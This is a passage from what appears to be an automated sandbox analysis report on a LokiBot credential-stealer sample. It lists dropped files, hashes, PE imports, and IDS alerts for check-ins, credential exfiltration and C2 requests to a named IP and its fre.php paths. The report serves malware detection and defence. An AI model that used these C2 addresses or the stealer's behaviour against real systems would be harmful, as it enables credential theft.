23:36:59	API Interceptor	1x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
94.156.177.41	0yWVteGq5T.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/simple/five/fre.php
	CLOSURE DATE FOR THE YEAR.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/kings/five/fre.php
	Order84746.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/davinci/five/fre.php
	FVR-N2411-07396.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	94.156.177.41/soja/five/fre.php
	Scan copy.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	94.156.177.41/simple/five/fre.php
	file.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/maxzi/five/fre.php
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.41/simple/five/fre.php
	stthigns.doc	Get hash	malicious	Lokibot	Browse	94.156.177.41/maxzi/five/fre.php
	goodtoseeuthatgreatthingswithentirethingsgreatfor.hta	Get hash	malicious	Cobalt Strike, Lokibot	Browse	94.156.177.41/maxzi/five/fre.php
	PO-000041492.docx.doc	Get hash	malicious	Lokibot	Browse	94.156.177.41/maxzi/five/fre.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NET1-ASBG	DEMONS.arm.elf	Get hash	malicious	Unknown	Browse	93.123.76.18
	i686.elf	Get hash	malicious	Unknown	Browse	83.222.191.146
	sh4.elf	Get hash	malicious	Unknown	Browse	83.222.191.146
	i486.elf	Get hash	malicious	Unknown	Browse	83.222.191.146
	83.222.191.146-mips-2024-12-28T00_37_43.elf	Get hash	malicious	Gafgyt	Browse	83.222.191.146
	ppc.elf	Get hash	malicious	Unknown	Browse	83.222.191.146
	x86.elf	Get hash	malicious	Unknown	Browse	83.222.191.146
	x86_64.elf	Get hash	malicious	Unknown	Browse	83.222.191.146
	arm5.elf	Get hash	malicious	Unknown	Browse	83.222.191.146
	m68k.elf	Get hash	malicious	Unknown	Browse	83.222.191.146

Process:	C:\Users\user\Desktop\ZsRFRjkt9q.exe
File Type:	data
Category:	dropped
Size (bytes):	85096
Entropy (8bit):	7.956236815297617
Encrypted:	false
SSDEEP:	1536:lH4FSjyTio+5s6Vftdr0Z8PciyZcGcbDFw64Ci29forlBrvVmn:lH4sjy2s6VftdBUiQ8bz4Ci9vMn
MD5:	29632577CA310C265592C42FC4AA7855
SHA1:	6F3CC4A4B49FB3015B837B9B6C2A1C26B1F61484
SHA-256:	56C586757BE5FAAA094FCECC4403264DE8E645439F446ABECB500188BDCCF411
SHA-512:	2343522D4393D5DAA3B62D021DA7AC0C0639306942D1B3D771BA3789724319813BB3C9A2920CB14AB78ED114CDB6819FFFBE3C802F125553E54090ADB48AD725
Malicious:	false
Reputation:	low
Preview:	EA06.....C....R.S..g4=.2.M..4jE:.Y.T&.)...T.S.`....x.....X..k@...x......a..b.0.4^....o..D..0.J.sy.{;...5H..m].I$.k.&7n...X.>yO..-g....yy.7.......w......./.'.~x...si.g.>..n.t....Zg.}..;..w......Y.......1...'5..p...\|2....t_.....l=.\..I(.l}U.....q..>?U.....P.KZ.un.Q..S..J.X...</=.3.W@...$.;. ..X......3...b.R...%..S.}JmNG1.......sV.,..+.=..'.J..Z?.....2..@.>....;.......H.......cA.Z.n..]Z/4.K..B...< ..}N,.<Cg.._..q...fR....i...3...aO..'.....'T....L.......<qj@._...;.#....{..M_a..x......R9........j.?....x...................L.~.(........l.}...-...B...<%5..\|....g7...M..)...L..........P.{S....=....P...D.z...j..=W..........b...mm6..xqJ......z.J]N...K.[...gP.r...5"...Q........P...........>m9.P....k]..L0.z."..Sz.)h.q..8.yM..N..(@.....W).:..A..Z.. ..=y.vz2.4....x.*%$.y.....f.J.xT.a...B..t....s0....>.3.....Xe....E`[>.v.....U/.f...:{ZU....S..m....S$.h_.YU.S.o..kq..Z..MZ.Y.D7..m..K[....C......P.`....S3.....^.M.J.C.....9.q(u.!.U...;:....f...E'.@.

C:\Users\user\AppData\Local\Temp\epistemology

Download File

Process:	C:\Users\user\Desktop\ZsRFRjkt9q.exe
File Type:	data
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	7.552419329979548
Encrypted:	false
SSDEEP:	1536:CIH+UtApYUaeLBRHWb97G5meMpBX74cZMrYWeSjpnonFxnxliKamOyIMpypt:F+yPUaeLXAObMpBXQRp6HxliKpC
MD5:	7A00572DB84E48580D9DC0A21C6A703D
SHA1:	AD2C987E42138A9CF1BFDE43C91828041E1EBB65
SHA-256:	79D06908314CFD7A9F578C3B107C099A4C1FA315B606315A61276C801E9083F7
SHA-512:	B6C509FC9C35405997C8DC43F55BF91F82551E51706DE28538E30106C3189F352F3B9E56536AE47A34F6A6F267C2EB4F43A11FCB6F55760002C3CDD0CC5FF028
Malicious:	false
Reputation:	low
Preview:	...OPTMS719C..PM.69FHNXY.P6B1ESTXOSTMS319CC3PMK69FHNXYZP6B1E.TXO]K.]3.0.b.Q...m.!=x)(?Q0P(s79!=;9sQT.16]p$%.}..n56>5.O<OwTXOSTMS..A..F../...N.....E.......%...Z...]..t....L...'...N....../..G.../...... ..w....E.pa....U..$(^..^.XYZP6B1E..XO.UIS.9U.C3PMK69F.N[XQQ:B1}RTX.[TMS31.zB3P]K69.INXY.P6R1ESVXOVTLS319CF3QMK69FHnRYZT6B1ESTZOS.MS#19SC3PM[69VHNXYZP&B1ESTXOSTMS.8C'3PMK69FHNXYZP6B1ESTXOSTMS319CC3PMK69FHNXYZP6B1ESTXOSTMS319CC3PMK69FHNXYZP6B1ESTXOSTM.21eCC3PMK69FHNXYZP6B1ESTXOSTMS.E\;73PM..8FH^XYZh7B1ASTXOSTMS319CC3pMKV.4,/,8ZPV.1ES.YOS.MS3.8CC3PMK69FHNXY.P6..!2 9OSTi.;19.B3POK698INXYZP6B1ESTXO.TM..I9CC3PMK.9FHNRYZp6B1.RTXOSTMS319CC3PMK.9FHNXYZP6B1ESTXOSTMS319CC3PMK69FHNXYZP6B1ESTXOSTMS319CC3PMK69FHNXYZP6B1ESTXOSTMS319CC3PMK69FHNXYZP6B1ESTXOSTMS319CC3PMK69FHNXYZP6B1ESTXOSTMS319CC3PMK69FHNXYZP6B1ESTXOSTMS319CC3PMK69FHNXYZP6B1ESTXOSTMS319CC3PMK69FHNXYZP6B1ESTXOSTMS319CC3PMK69FHNXYZP6B1ESTXOSTMS319CC3PMK69FHNXYZP6B1ESTXOSTMS319CC3PMK69FHNXYZP6B1ESTXOSTMS319CC3PMK69FHNXYZP6B1ESTXOSTMS31

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbq:4
MD5:	8CB7B7F28464C3FCBAE8A10C46204572
SHA1:	767FE80969EC2E67F54CC1B6D383C76E7859E2DE
SHA-256:	ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
SHA-512:	9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.7177137644996305
TrID:	Win32 Executable (generic) a (10002005/4) 99.70% Win32 EXE Yoda's Crypter (26571/9) 0.26% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ZsRFRjkt9q.exe
File size:	1'023'488 bytes
MD5:	7f04a1d1824b3ec895b377a60c065145
SHA1:	f89bf4fea5f1be66fd69d14dadc88e7f4ea24606
SHA256:	d360ff97054b8da398a04cc947ba71f00e6f04ad83163abc9c13a5eaf9d7bd83
SHA512:	67c7d7ffbdc0686af39888c08a303ab03ea60630308b1a8b3fc4badcd14f9f9438e48b42da050c5fd461b7564cfb094ba41d9d80b2cabddb9c2e0687a525e1dd
SSDEEP:	12288:Htb20Qc3lT7af41ePBRYuQLKpqeUhbTv5OFgNDPPpHrYP72RGghXgLxH4oJ:Htb20pkaCqT5TBWgNjVYD2QN/J
TLSH:	1825BF1373DE8360C7B26273BA657701AE7B782506B5F96B2FD4093DE820162521EB73
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x425f74
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6745624F [Tue Nov 26 05:53:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	c1d258acab237961164a925272293413

Entrypoint Preview

Instruction
call 00007FA5F050C6CFh
jmp 00007FA5F04FF6E4h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FA5F04FF86Ah
cmp edi, eax
jc 00007FA5F04FFBCEh
bt dword ptr [004C0158h], 01h
jnc 00007FA5F04FF869h
rep movsb
jmp 00007FA5F04FFB7Ch
cmp ecx, 00000080h
jc 00007FA5F04FFA34h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FA5F04FF870h
bt dword ptr [004BA370h], 01h
jc 00007FA5F04FFD40h
bt dword ptr [004C0158h], 00000000h
jnc 00007FA5F04FFA0Dh
test edi, 00000003h
jne 00007FA5F04FFA1Eh
test esi, 00000003h
jne 00007FA5F04FF9FDh
bt edi, 02h
jnc 00007FA5F04FF86Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FA5F04FF873h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FA5F04FF8C5h
bt esi, 03h
jnc 00007FA5F04FF918h
movdqa xmm1, dqword ptr [esi+00h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2012 UPD4 build 61030
[RES] VS2012 UPD4 build 61030
[LNK] VS2012 UPD4 build 61030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb7004	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc4000	0x30d24	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf5000	0x6c4c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8d8d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb2730	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8d000	0x860	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8b54f	0x8b600	f437a6545e938612764dbb0a314376fc	False	0.5699499019058296	data	6.680413749210956	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8d000	0x2cc42	0x2ce00	ede9d722bf5e27d1f93aaf9e53240a22	False	0.3183049704038997	data	5.682422502790088	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xba000	0x9d54	0x6200	e0a519f8e3a35fae0d9c2cfd5a4bacfc	False	0.16402264030612246	data	2.002691099965349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc4000	0x30d24	0x30e00	435c4da2cbb1654f15376ed202d668dc	False	0.8691556106138107	data	7.746212870537227	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xf5000	0xa474	0xa600	583c8e8dd8fd50de8aa1ba67df48e8de	False	0.0015060240963855422	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc44a0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc45c8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc48b0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc49d8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc5880	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc6128	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc6690	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xc8c38	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xc9ce0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_STRING	0xca148	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xca6dc	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcad68	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcb1f8	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcb7f4	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcbe50	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcc2b8	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcc410	0x283fb	data			1.0003700131627633
RT_GROUP_ICON	0xf480c	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0xf4884	0x14	data	English	Great Britain	1.15
RT_VERSION	0xf4898	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0xf4974	0x3b0	ASCII text, with CRLF line terminators	English	Great Britain	0.5116525423728814

Imports

DLL	Import
KERNEL32.DLL	HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
ADVAPI32.dll	GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
COMCTL32.dll	ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
GDI32.dll	SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
PSAPI.DLL	GetProcessMemoryInfo
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
USER32.dll	SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
USERENV.dll	UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
WSOCK32.dll	__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-03T05:36:58.373173+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	56480	94.156.177.41	80	TCP
2025-01-03T05:36:58.373173+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	56480	94.156.177.41	80	TCP
2025-01-03T05:36:58.373173+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	56480	94.156.177.41	80	TCP
2025-01-03T05:36:59.072613+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.4	56480	94.156.177.41	80	TCP
2025-01-03T05:36:59.227615+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	56481	94.156.177.41	80	TCP
2025-01-03T05:36:59.227615+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	56481	94.156.177.41	80	TCP
2025-01-03T05:36:59.227615+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	56481	94.156.177.41	80	TCP
2025-01-03T05:36:59.935744+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.4	56481	94.156.177.41	80	TCP
2025-01-03T05:37:00.003476+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	56482	94.156.177.41	80	TCP
2025-01-03T05:37:00.003476+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	56482	94.156.177.41	80	TCP
2025-01-03T05:37:00.003476+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	56482	94.156.177.41	80	TCP
2025-01-03T05:37:00.713558+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	56482	94.156.177.41	80	TCP
2025-01-03T05:37:00.713558+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	56482	94.156.177.41	80	TCP
2025-01-03T05:37:00.888134+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	56483	94.156.177.41	80	TCP
2025-01-03T05:37:00.888134+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	56483	94.156.177.41	80	TCP
2025-01-03T05:37:00.888134+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	56483	94.156.177.41	80	TCP
2025-01-03T05:37:01.736515+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	56483	94.156.177.41	80	TCP
2025-01-03T05:37:01.736515+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	56483	94.156.177.41	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 05:36:58.361592054 CET	56480	80	192.168.2.4	94.156.177.41
Jan 3, 2025 05:36:58.366522074 CET	80	56480	94.156.177.41	192.168.2.4
Jan 3, 2025 05:36:58.366622925 CET	56480	80	192.168.2.4	94.156.177.41
